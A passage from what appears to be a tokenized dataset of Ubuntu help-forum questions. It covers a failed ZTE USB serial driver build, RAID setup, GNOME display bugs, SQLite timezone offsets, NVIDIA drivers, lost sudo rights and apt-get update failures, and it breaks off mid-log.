‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:435:2 : warning : passing argument 1 of ‘port- > serial- > type- > write_room’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:435:2 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_chars_in_buffer’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:451:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:457:2 : warning : passing argument 1 of ‘port- > serial- > type- > chars_in_buffer’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:457:2 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_throttle’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:472:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:479:3 : warning : passing argument 1 of ‘port- > serial- > type- > throttle’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:479:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_unthrottle’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:491:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:498:3 : warning : passing argument 1 of ‘port- > serial- > type- > unthrottle’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:498:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_ioctl’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:511:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:518:3 : warning : passing argument 1 of ‘port- > serial- > type- > ioctl’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:518:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:518:3 : warning : passing argument 2 of ‘port- > serial- > type- > ioctl’ makes integer from pointer without a cast [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:518:3 : note : expected ‘unsigned int’ but argument is of type ‘struct file *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:518:3 : error : too many arguments to function ‘port- > serial- > type- > ioctl’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_set_termios’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:535:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:542:3 : warning : passing argument 1 of ‘port- > serial- > type- > set_termios’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:542:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:542:3 : warning : passing argument 2 of ‘port- > serial- > type- > set_termios’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:542:3 : note : expected ‘struct usb_serial_port *’ but argument is of type ‘struct termios *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:542:3 : error : too few arguments to function ‘port- > serial- > type- > set_termios’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_break’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:554:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:561:3 : warning : passing argument 1 of ‘port- > serial- > type- > break_ctl’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:561:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_tiocmget’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:629:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:635:3 : warning : passing argument 1 of ‘port- > serial- > type- > tiocmget’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:635:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:635:3 : error : too many arguments to function ‘port- > serial- > type- > tiocmget’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_tiocmset’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:651:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:657:3 : warning : passing argument 1 of ‘port- > serial- > type- > tiocmset’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:657:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:657:3 : warning : passing argument 2 of ‘port- > serial- > type- > tiocmset’ makes integer from pointer without a cast [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:657:3 : note : expected ‘unsigned int’ but argument is of type ‘struct file *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:657:3 : error : too many arguments to function ‘port- > serial- > type- > tiocmset’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘usb_serial_port_work’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:697:12 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘port_release’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:709:2 : error : ‘struct device’ has no member named ‘bus_id’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘usb_serial_probe’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:858:2 : error : implicit declaration of function ‘lock_kernel’ [ -werror=implicit-function-declaration ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:861:3 : error : implicit declaration of function ‘unlock_kernel’ [ -werror=implicit-function-declaration ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1034:3 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1182:23 : error : ‘struct device’ has no member named ‘bus_id’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1182:51 : error : ‘struct device’ has no member named ‘bus_id’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1183:3 : error : ‘struct device’ has no member named ‘bus_id’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘usb_serial_disconnect’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1257:13 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1258:21 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : at top level : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1280:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1280:2 : warning : ( near initialization for ‘serial_ops.ioctl’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1281:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1281:2 : warning : ( near initialization for ‘serial_ops.set_termios’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1284:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1284:2 : warning : ( near initialization for ‘serial_ops.break_ctl’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1286:2 : error : unknown field ‘read_proc’ specified in initializer /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1286:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1286:2 : warning : ( near initialization for ‘serial_ops.ioctl’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1287:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1287:2 : warning : ( near initialization for ‘serial_ops.tiocmget’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1288:2 : warning : initialization from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1288:2 : warning : ( near initialization for ‘serial_ops.tiocmset’ ) [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘usb_serial_init’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1352:2 : error : implicit declaration of function ‘info’ [ -werror=implicit-function-declaration ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘fixup_generic’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1406:2 : error : ‘struct usb_serial_driver’ has no member named ‘shutdown’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1406:2 : error : ‘struct usb_serial_driver’ has no member named ‘shutdown’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1406:1 : error : ‘usb_serial_generic_shutdown’ undeclared ( first use in this function ) /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:1406:1 : note : each undeclared identifier is reported only once for each function it appears in cc1 : some warnings being treated as errors make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic' make : *** [ modules ] error 2 install finished ! any suggestion ? update : from installation document , in some special cases , the setup package can’t automatically compile the driver , so you need change the configurations yourself and manually compile the driver . method : enter the directory : /usr/local/bin/ztemtapp/zteusbserial , and find the corresponding kernel version of current system . i can see 2.6.27 2.6.28 2.6.29 2.6.30 2.6.31 2.6.32 2.6.33 2.6.34 2.6.35 2.6.36 2.6.37 2.6.38 2.6.39 below2.6.2 in the directory . which version shall i pick up for installation ? readme file says , we have to do this to insert ztemt.ko in kernel .
230666	how to install software raid 0 on ubuntu 12.04 server with mdadm ?	i need to install a software raid-0 array on a ubuntu 12.04 server with mdadm through commandline ( ssh ) . the drive setup is as follows : sda = os ssd sdb = hdd for raid 0 sdc = hdd for raid 0
230670	apportcheckresume recurring error and gnome shell fixations	since installing ubuntu 12.10 gnome remix i encounter unpredictable and unwanted behavior of my system . almost after each resume from suspend ( or even after unlocking the screen after it goes blank ) i get apportcheckresume error and message ubuntu 12.10 has encountered an internal error . many times the system event wont resume and i need to restart it . other times log in screen is not visible , the screen is blank and i have to write my password in blanco . sometimes additional things also happen - textures get messed up and background and windows get distorted by horizontal lines sorry i ca n't localize the log file for the errors . my system specification : ubuntu 12.10 3.5.0-19-generic gnome 3.6 thinkpad t400 graphics mobile intel® gm45 express chipset intel® core™2 duo cpu p8600
230673	gnome3 pointer barrier not working with dual monitors	i have a dual monitor setup using gnome3 on ubuntu 12.04.1 . misc info : in the past i used fedora , there was a pointer barrier between my two monitors in the upper left corner so that i can hit the hot corner when moving from the right monitor to the left monitor . problem : however , with my new ubuntu installation , the barrier no longer exists and my mouse pointer glides straight to the next screen . this makes that hot corner nearly useless . i 've looked around , messed with the values in /usr/share/gnome-shell/js/ui/layout.js , but i ca n't figure out how to make the pointer barrier work . does anyone have a suggestion ?
230676	sqlite3 timestamp ( current_timestamp ) one hour off	i run a small crawler on a virtual ubuntu server , initiated by crontab hourly . datetime is inserted by defaulting the date filed to timestamp default current_timestamp . table creation looks like this : create table links ( page text , link text , date timestamp default current_timestamp , primary key ( page , link ) ) ; the datetime gets stored fine , but it one hour off ( one hour behind ) norwegian time ( gmt +1 ) . the server is located where-ever , i just need it to be on gmt+1 . by typing datein the ssh session i get : wed dec 19 17:26:02 cet 2012 and that is correct ( just now ) . so where does sqlite3 get it 's time from ? what must i do to set the time so that sqlite3 gets the time right ?
230677	how to install nvidia drivers from source if the packages do n't work ?	i have just installed xubuntu on a pretty old ( 12 years of age ) pc and i am struggling to install the correct drivers for the gpu nvidia geforce4 mx 420 ... i have managed to get `` additional drivers '' but the app does not show in the menu , i went through a few procedures which ended up in my screen going no higher than 640x480 , and tried all the sudo apt-get variations with nvidia-current and current updates ... i think i got the right version of the drivers ( 93.43.07 ) but they wo n't install from terminal as they say i am running an x server . so i shut the xserver but then i try and install them from terminal but after i write the exact same command sudo home/username/downloads/nvidia-linux-x86-96.43.07.pkg1.run nothing happens and the terminal says something like command not found . . there are lots of similar topics on installing nvidia drivers but i seem to understand that current drivers are no good for my old gpu . any help would be greatly appreciated ! : )
230681	second display is rotated	i 've just updated to ubuntu 12.10 last night . when i was at the office , i connected my laptop with a projector . although it can detect the projector , it incorrectly set the projector portrait . also , if i click the rotation dropdown , it had no normal option . it only offered anticlockwise and clockwise options . ofcourse the projector would display my desktop 90 degrees clockwise/anticlockwise . i 've just tested my laptop again with an lcd monitor , and it happened again . below is my screenshot of my display settings dialog . my display adapter is intel gma 950 . how to fix this problem ?
230683	weird graphical issues with gnome shell in 12.10	i finally got gnome shell working on ubuntu 12.10 , but there are some weird graphical issues . it seems as if the text is corrupted or something . here 's a screenshot of what i 'm talking about : it happens on a bunch of different applications , but not when i 'm using ubuntu . does anyone know why or how to fix it ? my graphics card is an amd radeon hd 6540g2 , and i 'm using the open source drivers ( fglrx does n't work with 12.10 yet ) . edit : i left it for an hour to take a shower . it locked , and when i came back it was much worse :
230684	wubi install freezes 3/4 through	i downloaded ubuntu on a usb stick , then the windows installer , and ran wubi.exe . when i rebooted to complete the installation , it froze 3/4 of the way through . after 30 minutes of waiting i removed the usb stick . i 've tried again and the same thing happens . will it harm my computer in any way ?
230686	date and time format	how to echo date and time like this [ day-month-year/hour-minutes-seconds ] including `` [ `` and `` / '' . i also need to redirect it in a file . thanks
230687	how do i left-click a java application on a wetab running ubuntu 12.10 ? ( workaround defect in onboard )	i installed ubuntu 12.10 on my wetab . everything works perfectly ( albeit slowly ) and i can touch and use every application execpt ones written in java . when i start any java application the touchscreen does not recognize the left click . i believe it 's a problem in onboard ( the onscreen keyboard ) because when i touch the mouse icon on the onboard and then the java application the left click works . this is very cumbersome for every click to first hit onboard mouse icon and then button in the java app i would like to click . it defeats the purpose of a touchscreen . the java application is definitly touchable as it 's running on 10 other machines with elo touchscreen . how do i get ubuntu to recognize the left click in a java application automatically when i touch the screen ? or a way to dignose this so i can make a clear bug report ? this happens in all the desktop environments ( gnome/unity , xfce4 and lxde ) i tried with openjdk-6-* and openjdk-7-* stats : wetab 32gb 3g 2gb ram intel ( r ) atom ( tm ) cpu n450 @ 1.66ghz - 64-bit ubuntu 12.10 - 64 bit unity desktop environment xubuntu desktop environment lubuntu desktop environment the real touchscreen driver from eeti ( egalaxy ) ( also did n't work with the ubuntu standard touchscreen driver )
230689	launching executable from /usr/local/bin needs access to local file	i have an executable , called `` octane '' , that i want to be able to launch globally . the executable requires access to a local binary , `` octane.dat '' , in order to run . i placed the directory containing the executable and the binary in /opt/ as root and created a symbolic link of the executable in /usr/local/bin/ . now , if i type `` octane '' anywhere , it launches but throws up an error saying it wo n't run without the binary , `` octane.dat '' . octane will only launch if my current working directory is the same as the executable and binary , in /usr/local/bin . any suggestions on how to fix this ? do i have to make that directory global using .bashrc ? thanks .
230690	lost sudo privileges	last night i was working on installing vsftpd on my ubuntu 12.10 server . i shutdown last night and when i booted up this morning i seemed to have lost the abilities to sudo anything . it just says , `` ** is not in the sudoers file . this incident will be reported . '' now i was n't messing with any sudo files , just /etc/vsftpd.confg and /etc/shells . so how did i seemingly lose sudo ability ? i 'm rather new to linux in general , but i 'm picking it up quick .
230696	how to add print screen functionality ?	i just started with ubuntu minimal and lamp stack.. cinnamon is the gui now what i want is the print-screen functionality , so that when i hit the printscreen the screenshot must take place being saved as an image ( jpe/jpeg ) file somewhere .
230697	need ia32-libs to run 32bit app on 64 bit os	i need to use the program topdrawer . there is only a 32 bit version of topdrawer available , so according to their wiki i need to install ia32-libs to use it . however , when i try sudo apt-get install ia32-libs i get the following error message : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages . i 've tried to install ia32-libs-multiarch as well , but i get : e : package 'ia32-libs-multiarch ' has no installation candidate please bear in mind i am quite new to linux - i only installed it a few months ago so that i could use madgraph , which is what i now need topdrawer for .
230698	how to restart the networking service ?	i tried to use sudo service networking restart and sudo /etc/init.d/network restart but they both crash the window manager and i can no longer use my keyboard for input into x. when i use the /etc/init.d/ method it complains saying that i should use the service utility e.g . service networking restart but it crashes just the same . is there a gui method of restarting networking ?
230700	how can install plugins for play mp3 and wma file which play on browser	i am new user of ubuntu and i am facing an problem when i use web page and play any online mp3 voice file while my voice file not play i show an error `` plug in missing `` , ... i try to install this plugins but i am not able to install this plugins . this problem persist on both browser firefox and chrome , i required plugins for mp3 and wma format , kindly give me easy command for this issue step by step i m waiting for your quick responce regards deepaksharma tech support engineer new delhi india
230702	how do i remove ubuntu 12.04 completely	please help i have read through all possible option on getting this done and am getting nowhere fast . i need to completely remove ubuntu 12.04 and install win xp . it is not a dual boot system and the disk i am using is a torrent download so not automatically loading when the pc boots up .
230703	problems with the new kernel	i update to the new kernel 3.5.0.21 ... a few minutes ago . ubuntu doesn´t boot properly after the update . give a me a window that says low graphics mode and input devices disabled . i can´t press ok because my keyboard and mouse doesn´t works . i´m using the previous kernel now . thanks ! !
230709	problem with software updates in 12.04	since two weeks ago i ca n't update my package sources and software in german ubuntu 12.04 . running `` sudo apt-get update '' in my terminal gives me this message : maximilian @ maximilian-vostro-3700 : ~ $ sudo apt-get update ign http : //ppa.launchpad.net precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //dl.google.com stable inrelease ign http : //archive.canonical.com precise inrelease hole:1 http : //repository.spotify.com stable inrelease [ 2.979 b ] ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease ign http : //archive.ubuntu.com precise inrelease hole:2 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hole:3 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hole:4 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hole:5 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //deb.opera.com stable inrelease hole:6 http : //archive.canonical.com precise release.gpg [ 198 b ] ign http : //archive.ubuntu.com precise release.gpg ign http : //archive.ubuntu.com precise-updates release.gpg hole:7 http : //ppa.launchpad.net precise release [ 11,9 kb ] hole:8 http : //security.ubuntu.com precise-security release [ 49,6 kb ] hole:9 http : //repository.spotify.com stable/non-free i386 packages [ 896 b ] ign http : //archive.ubuntu.com precise-backports release.gpg hole:10 http : //archive.canonical.com precise release [ 7.078 b ] hole:11 http : //deb.opera.com stable release.gpg [ 189 b ] hole:12 http : //extras.ubuntu.com precise release [ 11,9 kb ] hole:13 http : //dl.google.com stable release [ 1.338 b ] ign http : //repository.spotify.com stable/non-free translationindex hole:14 http : //archive.ubuntu.com precise release.gpg [ 198 b ] hole:15 http : //packages.medibuntu.org precise inrelease [ 7.096 b ] hole:16 http : //deb.opera.com stable release [ 632 b ] hole:17 http : //ppa.launchpad.net precise/main sources [ 668 b ] ign http : //archive.ubuntu.com precise release hole:18 http : //dl.google.com stable/main i386 packages [ 464 b ] hole:19 http : //archive.canonical.com precise/partner sources [ 4.516 b ] ign http : //archive.ubuntu.com precise-updates release hole:20 http : //deb.opera.com stable/non-free i386 packages [ 773 b ] hole:21 http : //extras.ubuntu.com precise/main sources [ 8.023 b ] hole:22 http : //ppa.launchpad.net precise/main i386 packages [ 1.045 b ] ign http : //ppa.launchpad.net precise/main translationindex hole:23 http : //archive.canonical.com precise/partner i386 packages [ 6.041 b ] ign http : //dl.google.com stable/main translationindex ign http : //archive.ubuntu.com precise-backports release ign http : //archive.canonical.com precise/partner translationindex hole:24 http : //packages.medibuntu.org precise/free sources [ 3.348 b ] ign http : //deb.opera.com stable/non-free translationindex hole:25 http : //security.ubuntu.com precise-security/main sources [ 59,7 kb ] hole:26 http : //archive.ubuntu.com precise release [ 49,6 kb ] hole:27 http : //extras.ubuntu.com precise/main i386 packages [ 10,7 kb ] ign http : //extras.ubuntu.com precise/main translationindex hole:28 http : //packages.medibuntu.org precise/non-free sources [ 4.394 b ] hole:29 http : //packages.medibuntu.org precise/free i386 packages [ 3.243 b ] hole:30 http : //packages.medibuntu.org precise/non-free i386 packages [ 6.643 b ] ign http : //packages.medibuntu.org precise/free translationindex ign http : //archive.ubuntu.com precise/main translationindex ign http : //packages.medibuntu.org precise/non-free translationindex hole:31 http : //security.ubuntu.com precise-security/restricted sources [ 1.950 b ] hole:32 http : //security.ubuntu.com precise-security/multiverse sources [ 1.382 b ] hole:33 http : //security.ubuntu.com precise-security/universe sources [ 18,9 kb ] hole:34 http : //security.ubuntu.com precise-security/main i386 packages [ 221 kb ] ign http : //archive.ubuntu.com precise/multiverse translationindex ign http : //archive.ubuntu.com precise/restricted translationindex ign http : //archive.ubuntu.com precise/universe translationindex hole:35 http : //security.ubuntu.com precise-security/restricted i386 packages [ 3.968 b ] hole:36 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2.392 b ] hole:37 http : //security.ubuntu.com precise-security/universe i386 packages [ 61,1 kb ] ign http : //archive.ubuntu.com precise-updates/main translationindex ign http : //archive.ubuntu.com precise-updates/multiverse translationindex ign http : //archive.ubuntu.com precise-updates/restricted translationindex ign http : //archive.ubuntu.com precise-updates/universe translationindex hole:38 http : //security.ubuntu.com precise-security/main translationindex [ 74 b ] hole:39 http : //security.ubuntu.com precise-security/multiverse translationindex [ 71 b ] hole:40 http : //security.ubuntu.com precise-security/restricted translationindex [ 71 b ] hole:41 http : //security.ubuntu.com precise-security/universe translationindex [ 73 b ] hole:42 http : //security.ubuntu.com precise-security/main translation-en [ 104 kb ] ign http : //archive.ubuntu.com precise-backports/main translationindex ign http : //archive.ubuntu.com precise-backports/multiverse translationindex hole:43 http : //security.ubuntu.com precise-security/multiverse translation-en [ 995 b ] hole:44 http : //security.ubuntu.com precise-security/restricted translation-en [ 978 b ] ign http : //archive.ubuntu.com precise-backports/restricted translationindex ign http : //archive.ubuntu.com precise-backports/universe translationindex hole:45 http : //security.ubuntu.com precise-security/universe translation-en [ 36,8 kb ] ign http : //repository.spotify.com stable/non-free translation-de_de hole:46 http : //archive.ubuntu.com precise/universe i386 packages [ 4.796 kb ] ign http : //repository.spotify.com stable/non-free translation-de ign http : //repository.spotify.com stable/non-free translation-en ign http : //deb.opera.com stable/non-free translation-de_de ign http : //archive.canonical.com precise/partner translation-de_de ign http : //ppa.launchpad.net precise/main translation-de_de ign http : //extras.ubuntu.com precise/main translation-de_de ign http : //deb.opera.com stable/non-free translation-de ign http : //archive.canonical.com precise/partner translation-de ign http : //dl.google.com stable/main translation-de_de ign http : //extras.ubuntu.com precise/main translation-de ign http : //ppa.launchpad.net precise/main translation-de ign http : //deb.opera.com stable/non-free translation-en ign http : //packages.medibuntu.org precise/free translation-de_de ign http : //packages.medibuntu.org precise/free translation-de ign http : //archive.canonical.com precise/partner translation-en ign http : //dl.google.com stable/main translation-de ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //packages.medibuntu.org precise/free translation-en ign http : //dl.google.com stable/main translation-en ign http : //packages.medibuntu.org precise/non-free translation-de_de ign http : //packages.medibuntu.org precise/non-free translation-de ign http : //packages.medibuntu.org precise/non-free translation-en hole:47 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hole:48 http : //archive.ubuntu.com precise/multiverse translationindex [ 2.676 b ] hole:49 http : //archive.ubuntu.com precise/universe translationindex [ 2.922 b ] hole:50 http : //archive.ubuntu.com precise/multiverse translation-de [ 108 kb ] hole:51 http : //archive.ubuntu.com precise/multiverse translation-en [ 93,4 kb ] hole:52 http : //archive.ubuntu.com precise/universe translation-de [ 1.801 kb ] hole:53 http : //archive.ubuntu.com precise/universe translation-en [ 3.341 kb ] fehl http : //archive.ubuntu.com precise/main sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/restricted sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/universe sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/main sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/restricted sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/universe sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-updates/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/main sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/restricted sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/universe sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] fehl http : //archive.ubuntu.com precise-backports/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] ign http : //archive.ubuntu.com precise/main translation-de_de ign http : //archive.ubuntu.com precise/main translation-de ign http : //archive.ubuntu.com precise/main translation-en ign http : //archive.ubuntu.com precise/multiverse translation-de_de ign http : //archive.ubuntu.com precise/multiverse translation-de ign http : //archive.ubuntu.com precise/multiverse translation-en ign http : //archive.ubuntu.com precise/restricted translation-de_de ign http : //archive.ubuntu.com precise/restricted translation-de ign http : //archive.ubuntu.com precise/restricted translation-en ign http : //archive.ubuntu.com precise/universe translation-de_de ign http : //archive.ubuntu.com precise/universe translation-de ign http : //archive.ubuntu.com precise/universe translation-en ign http : //archive.ubuntu.com precise-updates/main translation-de_de ign http : //archive.ubuntu.com precise-updates/main translation-de ign http : //archive.ubuntu.com precise-updates/main translation-en ign http : //archive.ubuntu.com precise-updates/multiverse translation-de_de ign http : //archive.ubuntu.com precise-updates/multiverse translation-de ign http : //archive.ubuntu.com precise-updates/multiverse translation-en ign http : //archive.ubuntu.com precise-updates/restricted translation-de_de ign http : //archive.ubuntu.com precise-updates/restricted translation-de ign http : 